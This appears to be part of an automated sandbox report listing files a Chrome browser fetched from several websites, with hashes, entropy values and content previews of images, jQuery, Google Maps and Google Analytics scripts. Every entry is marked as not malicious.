                                              SHA-512:27DF77CC4893CF8A5682B3691BA077746C1D49E057103C2D005B37BECBA484C1DE72CB414C0572823AA47EB5D8618CFF26B1830530347C8155AA1F52CF5672B2
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/gecome.png
                                              Preview:.PNG........IHDR.......P......N.....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 60 x 38, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):701
                                              Entropy (8bit):7.565148480818325
                                              Encrypted:false
                                              SSDEEP:12:6v/7s/6Ts/WR7gE8pqLvKTHkcfDWcSboL7SM4EOAusnsal6U48/rcumCcz:l/6hgEAqLvKLLfKcSbcXOAuMsall48/o
                                              MD5:8B4392A11C5101F73C0C9EEA0166B17E
                                              SHA1:1803B394A05843D2CCCA8D188D129943A966BA23
                                              SHA-256:8338AACB933F5A3309C8D0EA8D45C3ED78B5450A7E1A2A8471544DABDF354364
                                              SHA-512:EB3A105F6BA24DF228F5A7C81A9C6132A72C1BD7192B64D6EF02C4E867F3B1851DACE06AC6C938D145660553562B9739307F4272880CA93C92373023CCBBBED6
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/shape/22.png
                                              Preview:.PNG........IHDR...<...&.............pHYs.................sRGB.........gAMA......a....RIDATx..Qn.@......U ...O!'.oPnPn@o`z..!..z.p..'T..QS)j...EJ[...$!..!...%.B..3.;;6....Z...7....H..rQ..G..|..' .5.Ea..W.x..U.P..9.~...w..O..h..Ic.*7...k4....... y......5.n.c1..DXS...L.L>..Q....V`....N....-..G"[.E0.......d.........Fk.m,$..R..a1s.. ..%.....[..Y%UX.......*.......)...>.q.}....Z..A..k*.Q.._F....<....c.......~,}028...........rG8..UY&.....t. ..I.!{...>..+.'.5.........vN..u.c.VT..]i.i..=mF...i..0.;X......_E.TS..W.h.N.....!..3{.p......<...(.2._..x..Q..re....<...f..f].)Xj.(.A....+..'....<......`Qv.....i...?.G..PbCn.........a.n)./. {4&/Hd..y\kB..?.......O....IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2228
                                              Entropy (8bit):7.82817506159911
                                              Encrypted:false
                                              SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                              MD5:EF9941290C50CD3866E2BA6B793F010D
                                              SHA1:4736508C795667DCEA21F8D864233031223B7832
                                              SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                              SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                              Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (554)
                                              Category:dropped
                                              Size (bytes):184994
                                              Entropy (8bit):5.631569490379207
                                              Encrypted:false
                                              SSDEEP:3072:YxTjNm8H2AO+yNwbuQjTgkK6Drm545DtsdayPnR5t1P2/6FzgAEY7N3D0OTFOu/b:YxTPWAO+yNwSQngkKWy545ydaqnR5tlJ
                                              MD5:09E687964AECC32424F69065C6E09E01
                                              SHA1:B8D3F468CA1EB45F21FC919564FAD50089B072AE
                                              SHA-256:A55663C398778C3399E0BCB628DE29B8C4040611F00E8F996A7FEBF0CA0B3F84
                                              SHA-512:BA389AB20D835938602484CB87B6D57A0D73271FA54DE81E57781524B6847BA06B88E0DE492CAF72E5035D6D8A1105F58D3EF85392B13DE53CC5DE1B1B6ADDD8
                                              Malicious:false
                                              Reputation:low
                                              Preview:google.maps.__gjsload__('util', function(_){/*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var Zya,aza,cza,dza,eza,fza,hza,OC,QC,RC,jza,lza,UC,nza,VC,pza,WC,rza,qza,sza,tza,uza,vza,wza,xza,yza,zza,Aza,Bza,Cza,Dza,Eza,Fza,Gza,Hza,Iza,Jza,Kza,$C,Nza,bD,Oza,Pza,Qza,Rza,Sza,Tza,Uza,Vza,Wza,Xza,Yza,$za,bAa,dAa,fAa,hAa,jAa,lAa,nAa,pAa,rAa,sAa,tAa,uAa,vAa,wAa,xAa,yAa,cD,zAa,AAa,BAa,CAa,DAa,EAa,GAa,eD,fD,HAa,IAa,JAa,KAa,LAa,MAa,NAa,OAa,PAa,QAa,RAa,gD,SAa,hD,TAa,UAa,VAa,WAa,XAa,YAa,ZAa,iD,$Aa,jD,aBa,bBa,cBa,dBa,eBa,fBa,gBa,hBa,iBa,jBa,kBa,lBa,mBa,nBa,oBa,pBa,qBa,rBa,sBa,uBa,vBa,wBa,yBa,lD,zBa,ABa,.BBa,CBa,DBa,EBa,GBa,JBa,KBa,MBa,PBa,QBa,RBa,ED,FD,GD,TBa,ID,JD,KD,LD,ND,VBa,OD,WBa,XBa,YBa,PD,QD,RD,SD,TD,ZBa,$Ba,aCa,cCa,dCa,UD,eCa,bCa,hCa,iCa,$D,mCa,qCa,rCa,sCa,cE,tCa,vCa,wCa,xCa,yCa,fE,ACa,FCa,oE,ICa,HCa,qE,JCa,sE,LCa,MCa,NCa,PCa,QCa,RE,SCa,SE,TCa,UCa,VCa,WCa,UE,YCa,XCa,ZCa,aDa,cDa,eDa,iDa,gDa,jDa,hDa,VE,WE,mDa,nDa,XE,YE,ZE,aF,bF,cF,pDa,eF,fF,qDa,gF,rDa,hF,iF,sDa,jF,kF,tDa,lF,zD
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6678
                                              Entropy (8bit):7.946654735519426
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xZSan3FtD81KBZ+qxTLOiBqC7UT0uNJ9lzle:UIIHUCD4wa3SuDPZ+qxTL09jP9ve
                                              MD5:C17E0DF0B21C0930C8C0C84CF8E9C0FC
                                              SHA1:82333F1550F58C65E4CC17DDE47C86038496B40C
                                              SHA-256:1BD2D639F3283BABDAF7500A1447E230A0B64F03AAC99A23F078380D59863E89
                                              SHA-512:6AFAB28AFDC12482213769829B1B400A0C9248C1427BA3989D7813B970D3AFE66A0DE8236350FFB0E3B068CE056D7F8AADA6C3B30D544FFF5FF8798CE0A2B173
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 2546 x 672, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):62869
                                              Entropy (8bit):7.8165276002069835
                                              Encrypted:false
                                              SSDEEP:1536:vm9IDHy7NUqc00qPUgIiXQWsHYDBedU0yE:vmUuNUqfhPUVmQ0ledWE
                                              MD5:17944A0BC5F6256E19BCA5198FC5BC1E
                                              SHA1:6E98F2ED579EDE99C4084F60F62F5AD6DACC7ACA
                                              SHA-256:D226870C6677CE7034DE280F39C4A8E6CF68C0614412473F9167AFDFA9F921B2
                                              SHA-512:3BBAC5EE646921E200ED096ABBDBC15E02E7B89DD9AE3D3F88BB27B3EB7D664B6DD811E01113CA7A78158A1BD9A7535F806E8921CB1B3D72559F2A4F00927454
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...BiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.2 (20231101.m.2385 38bb2d3) (Windows)" xmpMM:InstanceID="xmp.iid:EE0DF744805E11EE9FA9A77BE8015A05" xmpMM:DocumentID="xmp.did:EE0DF745805E11EE9FA9A77BE8015A05"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EE0DF742805E11EE9FA9A77BE8015A05" stRef:documentID="xmp.did:EE0DF743805E11EE9FA9A77BE8015A05"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>K.......IDATx.....%U.8.z.30.4d.."..."A.E0..VY.T.YED....F`....<.A..A2" ....i.5.a...**...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (10616)
                                              Category:downloaded
                                              Size (bytes):11766
                                              Entropy (8bit):5.938839813472399
                                              Encrypted:false
                                              SSDEEP:192:2IGIsmhPhuKILOUPvROGXNXEcNFa2sVCR/Ib0j3X+mavMPW+pPo8tvFDegG/RmwZ:lVsmDuzL7PJOGXNXbNFa2sVCR/Ib0j3u
                                              MD5:A108013C3CAB805607988D5724EEFD1F
                                              SHA1:A6CDF4865C2624BFAF37820F4A833477550B3091
                                              SHA-256:13DC34C08267209037359A9686C8A3FD22EA04EEC9AC939FA484C048D9DF9257
                                              SHA-512:1D9A0D8C58C2E697B45FB3F3ED72E156615842BB5BC2FCEBBC3FB8B52FB70028975840C1DE83FBA26F6EAF934DBA176DF3781AEFBE4AD986850344F7D0CFA7D3
                                              Malicious:false
                                              Reputation:low
                                              URL:"https://maps.googleapis.com/maps/api/js?client=google-maps-embed&paint_origin=&libraries=geometry,search&v=weekly&loading=async&language=en&region=us&callback=onApiLoad"
                                              Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. var rules = {. createHTML: function(src) {. return src;. },. createScriptURL: function(src) {. return src;. }. };. var ttPolicy;. . try {. ttPolicy = window.trustedTypes.createPolicy('google-maps-api-loader', rules);. } catch(e) {. ttPolicy = rules;. }. . function getScript(src) {. var a, nonce = ((a = document.querySelector("script[nonce]")) == null ? void 0 : a.nonce) || "";. var s = document.createElement('script');. . s.src = ttPolicy.createScriptURL(src);. s.nonce = nonce;. document.head.appendChild(s);. }. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=988\u0026hl=en\u0026","https://khms1.googleapis.com/kh?v=988\u00
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):2960
                                              Entropy (8bit):7.9087022893027665
                                              Encrypted:false
                                              SSDEEP:48:gerB80dcvZdX4xjipmrCgOIu3L+7qJsxWPgvJxOd3ytqVLtgr0MSaB2:Pi0dKZdXYjiYGgOIuT34vJFt+tgAwB2
                                              MD5:63C71EFF4560B94271E10558C7B3200C
                                              SHA1:3FE96452347793D9B214516AF870BB0F4140CF70
                                              SHA-256:4F442AD4EC40D56413A8E9BC8CE3EF5A03EADCCD3FAEA58453ABF670D308BA6C
                                              SHA-512:B0365000CB2333FA194D49967AEB35A1E90F51A196BE72BD0449C08CA066D38731C71D10C27A99A6A41264D169A6068DC66287F9D60AC31E4249043716FCC09D
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.....U....................................bg...cl........N.........ao.`e.............qs...........................~.........W].....~.lk........Y..v......IDATh.Y.{..U.dE.r.+5.,.Gy.@Bv....G.t.l...=2...:....!Q...b.+].PJ.?.v...7 ..v......N...7..$.(@..$......w$n.....I.%..R.G.Q7..\<~.$...1...q.@2.....EI8.a....7O?.....m......#..dq.JB.........x&...".%0..[..(....$.........i...U.d..V.Ri.Y.g......bm-.c{.Qp&.d.a.._y.K.a....:.\SgY=.N....ZZ....M.F....5 .,..J..|.....*...3z..Wy...%.Bh....yu...\..JZ....x...8..U...^..$]v..U.....3.........v...t.m.)>...s.,..*......p.._Y"D,.+.k..../...x..k.m:g..&.>.z.]2d?..>w...[ba.....;.+.T.y..8WJ..6M.M".....#&8.T.....jc.uJ.U...q..]...ut*./....%.7.m1R~L-|..).be.-.Z.;c.*\...z.............e..e=d..5dQ.C..~v#.9.=...*k.1.,.t.M..%...>..#Y/.s......$....Y.].I.|.t.k...69..=..ad..w$...~....."....HX..^.u.:l..g....Y...BX.)oI....?...H..@....,)..j..].....X.a....c_B...L.u........(!........,
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):16
                                              Entropy (8bit):3.75
                                              Encrypted:false
                                              SSDEEP:3:HyX1iCkYn:SlLn
                                              MD5:C0CE4261C6D56530FDAC9A7E6149A247
                                              SHA1:B6691D574B9E2AE68FA5BF1D1D54C0156862C58B
                                              SHA-256:7F426BB8776D85A3B04C7493BDEE2CF7465A040E74610E464A42D4F059E54768
                                              SHA-512:E194E5225429E476E0D34944D483C84A22A1B221833D3066F3BF48211F112282343F15D239270731476D488EFA532E818D657BDDEB5FC1EB4BA90C3D8A9A9665
                                              Malicious:false
                                              Reputation:low
                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlvlS5hB0gCghIFDVgVc88=?alt=proto
                                              Preview:CgkKBw1YFXPPGgA=
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):19116
                                              Entropy (8bit):7.98519406186033
                                              Encrypted:false
                                              SSDEEP:384:CU6nbNck+/tvJ9X4IdZQQyz6vcDeCHgnSRBGCqWfPsNH0KUzyMwxBuE4CXAi:Sb+V/r9X42aDDMgQTW5xWRBagr
                                              MD5:E228B8482EAEEFC07C401459DD583F9C
                                              SHA1:52371D07A8F38F4F472068AFC18848292D0B16AC
                                              SHA-256:8FBC4D4D835A4966D8D9444BC741B6E3CB72EB5B85C44128335A38B7B51F7FA8
                                              SHA-512:242D4F35F21DA7C0F9D2092F95278F63B244ABB439C6CF6E55C217FCE3B1D9EA4E6FD8AB9F5E2F64E49A7F5AD2955C17C10DD07C9DE94056AD8243C4061C4E35
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.J..WEBPVP8L.J../..?......s...8.;o.."[.$......U.>..{.DP.......+nc.V.'.]....h.....g...w......Q....&...!.z..(`....Z..H.fJ.M.....P.R....`.A......iz.A.dp.mD._.LT..oF.....O].a..oxoU.L ,@ (.A.5._n_j.kj......3m.zt.._.....h.Snl..L.....mP...a.p.H(...Z.......O.\..:Rje..#...vZv..a...aE....Lv..ZG.\".)*...}F.:|.s..l..D.eN....[.D.....}+..%k.......kfv.(....BX.a...3.Og........H7..M.....l.X.S..@....i#m.J*.........6.X6x.&.&.@6......H........z..{.8=.....*...y.'...e[..=.6..I.I.u?`.+..m'......J.U.%..J.}......i..@..r.p.S...j.W.i(.c.Z.....xk....L.z..SkF.Ln..Re..*...1B.).....G..%.}.u..(.F.4.......7Y...V...b.,scMw..w.U...v...R.....>P..3.=R.n....\..<...YL.l......a.v.....Tl.....%..i.......VJ.rs,...VE.`.*..S..%..&8..[..2r...~>.1.+..N.zD...]...T<...'...*.rx.[..sw...Q.'d.....hH9...Ze.Y.V..q..!q.W"]...8....}!......>@.zx..Z.}.c.0.T.P..6...pZ.*..m(.S.....T.\.L)...Z.2...Qk]n&..3d....vV......:/y_...,..7.)..3.....k.M.T....Y...[8Qj.m.3.*..2...`C...7L.l...U.BO.[........=..,..T^[
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):32
                                              Entropy (8bit):4.476409765557392
                                              Encrypted:false
                                              SSDEEP:3:HSinaKthxRIK2YY:xb3ul1
                                              MD5:F48D440C5CBBC426AB26B9330ACBDD5D
                                              SHA1:E56058717495E067C9D2D556E8F9CBA82E232A71
                                              SHA-256:66BDBCAA50A78156A03941248543BCBA0515CA82DDDE4F235D15A5570FAE1D71
                                              SHA-512:0021EF375197391BC7555B69B25E4BC86142ABD0E769D81EA8EE14BB3E29D2CF2AE45FB6C99BB0337D5A67893F2DF70C60C7193F6A584F96BEB704BB7A4C332B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAn0fj5FcuG4PxIFDXhvEhkSEAmdpItwfrz4jBIFDbtXVmo=?alt=proto
                                              Preview:CgkKBw14bxIZGgAKCQoHDbtXVmoaAA==
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65451)
                                              Category:downloaded
                                              Size (bytes):89475
                                              Entropy (8bit):5.289540431614111
                                              Encrypted:false
                                              SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakV:AYh8eip3huuf6IidlrvakdtQ47GKl
                                              MD5:12B69D0AE6C6F0C42942AE6DA2896E84
                                              SHA1:D2CC8D43CE1C854B1172E42B1209502AD563DB83
                                              SHA-256:6150A35C0F486C46CADF0E230E2AA159C7C23ECFBB5611B64EE3F25FCBFF341F
                                              SHA-512:A55F55D56899AB440EF0CAE17B28D5CC8F5B9766D1E9BC1A8AC6B89376924B476C1AB0C325497EB5D44AF41F4EBF8EEA236D87A36902244B8A3ECA54994B8711
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/js/jquery.min.js
                                              Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (2343)
                                              Category:downloaded
                                              Size (bytes):52916
                                              Entropy (8bit):5.51283890397623
                                              Encrypted:false
                                              SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                              MD5:575B5480531DA4D14E7453E2016FE0BC
                                              SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                              SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                              SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google-analytics.com/analytics.js
                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):9030
                                              Entropy (8bit):7.969340574476585
                                              Encrypted:false
                                              SSDEEP:192:QX6GCf2RrNG/Z6aZ49YonTudmkb0/1C6tcX4xLS24dZ3MSkiEwu+aZmBcF:03CfMG/ca4R7WN6CXMSn3vfkycF
                                              MD5:754860B84EA9C2BCC9C0E93B1683389D
                                              SHA1:A83558EBCCA1F95052D49A6E050762F0A62F5E1E
                                              SHA-256:2191E3101B6F3FD9465A2E451E3CE3B1536DD0B68B21740BE99BC548A6D5A387
                                              SHA-512:FB47FCAF7ED7DAC17AF294F1943443F6C3DF59C03EB0AD65B4F9083933DC86B58777B0D3E3AD05E524190FEC7849AC0E6FCA0D0C1E3D8BCE173C1BDC9263759B
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<..".IDATx..].XT...Nr.FJ.P..P..).b..k..k.k.......`.&*.."...t3....0.G...e.e........9.y..;u1.M.$M.$M.$M.$M.$M.$M.$M.$M..;=M*..\y..3.G.?n;.....}..&..R.Y..\&-5.M+f.....?...(.3.........^..9X...WpE.$Ri.......-..6.n.3..=@$.5`k..!.....-..Y+.D.,.I...X..Xj..Jt...$..K#.sy"..(..,....~~......9.1....oI[..#..|.e.B..1...N....f.k../f]."..........%...+.{He.vl..Q&...shS..e..+2..m.Mz.1.........\...5g..5..NV.'.pB]:.a.n[G.|.....>9.S.65.R.G.So......:B&:......X1..P.?.....Iw.e..j....u..Y.*.,....Z.{V1.+.v.D*#)....`.3v.~m..#..P..L....42>O_.tvR..;.G.f..yc73.Ka....n.2.8....]..l4..K.*..#..J1..3#...!f..].vx..7...l.C..u.5w...{F.)..u...2..2.A..7.Z..^Pm_l.K..."..}.4.....z..<..........h....h../nn..nch....$h....!-.P..H...k>.@$....p............]8e;=r...."....42..>.".?T.......$t.S`..|....s0..N/`...{..`.'..g8!......s...&....'.......H..W.....8..L....:.Q.Y...........t.V...BfwF.Z....~.N.r.)................'/.u...1...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):12928
                                              Entropy (8bit):7.622308358842646
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwnghwrP0fRuF6UEMXXAYhu73fX5lMjlc9b4Qd67c5mhnIGp:4YNg7gCrPUIFAz3h6Q87eGp
                                              MD5:8F14CB921F071D3F17FB881315A95593
                                              SHA1:6E98F6FB5DE3A24FE44C975ACAFE29046E7651A8
                                              SHA-256:434245AD8ED6E75DDA29EB70FE724939D1FFF311DAA93114F5D096AF2A7B63C7
                                              SHA-512:783D8C84934B764C542FAC930C55C8E59DC78DD6EB277EFA069FC7DFAF11E67F1BCC80927932655C6BBF0B6BE1BE1AF3149F0A77D3831FF3A00F530E3569CA39
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):47858
                                              Entropy (8bit):7.9952926302069764
                                              Encrypted:true
                                              SSDEEP:768:2JarQw4iN28JSh6LnZn/2dbw7dP3KnouGgFQQ2+134WmC1ADwWAs/6ifDnFbMAoB:2Ja9N28gh6LR+d07dP8RZ2emadWAs/Pe
                                              MD5:E976A51CE5A776EDB7A5FAABB6D19F65
                                              SHA1:7CCF7A4A60840587146FFFDBFF66C88513A20326
                                              SHA-256:23CC8129244482B604729FE1B874EB079A26FB29172EB522B87B902534F2162C
                                              SHA-512:0883251286D375BAC341B1EF6AE950D41D0DA363F5093D03A147675777CB7FC1B3FD3FD9BE5D9CE3B34D7D48CF0F7E102A9DE4458ABB9159E50694EB13DFA8D8
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/21/ccbc0b3107341d28610c4ec42a1c8641.webp
